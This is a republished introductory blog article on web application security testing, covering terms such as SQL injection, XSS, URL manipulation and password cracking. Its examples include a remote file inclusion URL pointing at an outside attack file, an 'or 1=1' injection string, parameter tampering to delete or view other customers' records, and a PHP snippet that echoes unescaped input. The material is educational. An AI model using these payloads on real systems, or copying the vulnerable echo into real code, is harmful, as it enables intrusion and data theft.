SECURITY TESTING – Solution Analysts is an article sent to you by the InApps editorial team. Hope readers will have more useful knowledge at www.inapps.net


You are viewing the article: SECURITY TESTING – Solution Analysts

Introduction

As continues we are using web applications the size of useful data on the web increases, proper security testing of web applications is becoming very important. Security testing is the very much important process of testing life cycle, It is the process to confirm that confidential data stays confidential and users have access to perform only those tasks which are authorized to access.

The purpose of the security test is to discover the vulnerabilities of the web application so that the developers can then remove these vulnerabilities from the application and make the web application and data safe from unauthorized actions.

Key Terms Used in Security Testing

Vulnerability

It is like any type of weakness in the web application. The cause of it can be bugs in the application, an injection (SQL/ script code) or the presence of viruses.

Vulnerability can be as simple as weak passwords or as complex SQL injection vulnerabilities.

Example

http://www.testattack.com/index.php?page=http://www.vulnerabilityattack.com/attack.txt (This attack is for executing attack code on remote server)

URL Manipulation

Also known as URL rewriting, is the process of modifying parameters. Websites communicate with servers for sharing information to client (browser). Changing some information in the URL may sometimes lead to abnormal behaviour by the server.

The tester must check url if the application passes important information in the query string. This happens when the application uses the HTTP methods to pass information between the client and the server. The tester can modify a parameter value in the query string to check if the server accepts it.

Read More:   Update All that’s New on iOS 10 5th Beta Version

Example

http://www.testattack.com/savepage.php?nr=147&status=del (Changed status code from add to del to delete)

http://www.testattack.com/customerdetails.php?cid=149 (Changed customer Id to view the details of customer id = 149)

SQL Injection

This is code injection technique through the web application. In this technique site parameters are passed to database in form of SQL query in order to access database or modify it. Special characters from user inputs should be handled/escaped properly.

Entering a single quote (‘) in any textbox should be rejected by the application. If the tester succeeds to generate a database error, it means that the user details inserted in some query which is then executed by the application. In such a case, the application is vulnerable to SQL injection.

Example

Write below query in input fields and submit page rather than write in url and post page on server.

“SELECT * FROM users WHERE username = ‘martin’”; 

“SELECT * FROM users WHERE username = ” or ‘1=1′”;

XSS (Cross Site Scripting)

It is a type of injection which is typically found in web applications. Attacker can use this method to execute malicious script or URL on victim’s browser. Using cross-site scripting, attacker can use scripts like JavaScript to catch user cookies and information stored in the cookies.

The tester should additionally check the web application for XSS (Cross site scripting). Any HTML e.g. <HTML> or any script e.g. <SCRIPT> should not be accepted by the application.

Example

http://www. testattack.com/index.php?userid=123&query=xyz

<form action=”view.php” method=”GET” /> Welcome <p>Enter your name: <input type=”text” name=”myname” /><br /> <input type=”submit” value=”Find” /></p><br> </form> <?php echo “<p>Your Name <br />”; echo ($_GET[myname]); ?>

Password Cracking

In security testing of a web application Password cracking methods can be used to identify weak passwords. It can be start using guessing the common username and password or use of password cracking tool.

If username or password is stored in cookies without encrypting, attacker can use different methods to steal username and password.

Read More:   Update Wearable Technology for Smart Healthcare System

Example

Try to get username and password details from cookie in browser.

Modify variables using view source and resubmit page.

Penetration

It is a type of security testing process to find out insecure areas in projects. The main purpose of this testing is to protect the secure/important data from unknown user who is not valid user of the system like hackers.

There are two types of penetration testing, White box testing & Black box testing. In White box testing tester is having all information of system like IP Address, Code & flow diagram & based on available information tester will perform the testing.

In Black box testing, tester will perform testing without having any information of system. This will be more accurate testing method as testing done like real hackers.

Example 

Try to get password using reset feature.

Input validations must be validated server side also.

Conclusion

In this blog we’ve explained common terms which are used in web application vulnerabilities. Also we need to take care while security testing, the tester must be very careful and not to modify any of the following:

  • Configuration of the application or the server.
  • Services running on the server.
  • Existing user or customer data hosted by the application.

Additionally, a security test should be avoided on a production system.




Follow this to make sure you’ve got SECURITY TESTING – Solution Analysts. Save and share with those around you these extras.
To learn more about ECOMMERCE DEVELOPMENT

Contact us:
www.inapps.net

Rate this post
As a Senior Tech Enthusiast, I bring a decade of experience to the realm of tech writing, blending deep industry knowledge with a passion for storytelling. With expertise in software development to emerging tech trends like AI and IoT—my articles not only inform but also inspire. My journey in tech writing has been marked by a commitment to accuracy, clarity, and engaging storytelling, making me a trusted voice in the tech community.

Let’s create the next big thing together!

Coming together is a beginning. Keeping together is progress. Working together is success.

Let’s talk

Get a custom Proposal

Please fill in your information and your need to get a suitable solution.

    You need to enter your email to download

      Success. Downloading...